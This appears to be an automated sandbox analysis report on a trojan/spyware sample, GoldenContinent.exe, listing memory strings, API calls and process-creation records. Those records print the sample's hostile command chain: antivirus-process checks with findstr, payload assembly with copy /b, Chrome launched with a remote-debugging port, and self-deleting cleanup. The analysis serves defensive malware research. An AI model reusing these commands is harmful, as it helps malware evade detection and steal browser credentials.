                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: GoldenContinent.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: GoldenContinent.exe, Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: GoldenContinent.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: GoldenContinent.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: GoldenContinent.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000003.2217545869.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Users\user\Desktop\GoldenContinent.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C6F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C6F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\GoldenContinent.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C89FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C64763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C51B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\GoldenContinent.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Code function: 10_2_00C5F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\GoldenContinent.exe File created: C:\Windows\BlacksAtomic
                Source: C:\Users\user\Desktop\GoldenContinent.exe File created: C:\Windows\AxisEach
                Source: C:\Users\user\Desktop\GoldenContinent.exe File created: C:\Windows\BecauseMarch
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\523266\Relationship.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: String function: 00C0FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: String function: 00C10DA0 appears 46 times
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: String function: 004062CF appears 58 times
                Source: GoldenContinent.exeStatic PE information: invalid certificate
                Source: GoldenContinent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/39@5/6
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C641FA GetLastError,FormatMessageW,10_2_00C641FA
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C52010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00C52010
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51A0B AdjustTokenPrivileges,CloseHandle,10_2_00C51A0B
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00C5DD87
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C63A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00C63A0E
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR9WOJ0I.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile created: C:\Users\user\AppData\Local\Temp\nss264A.tmpJump to behavior
                Source: GoldenContinent.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Relationship.com, 0000000A.00000002.2594809497.000000000422C000.00000004.00000800.00020000.00000000.sdmp, WT0R1DJWB.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: GoldenContinent.exeVirustotal: Detection: 12%
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile read: C:\Users\user\Desktop\GoldenContinent.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\GoldenContinent.exe "C:\Users\user\Desktop\GoldenContinent.exe"
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 523266
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "landing" Ca
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Relationship.com x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wldp.dllJump to behavior
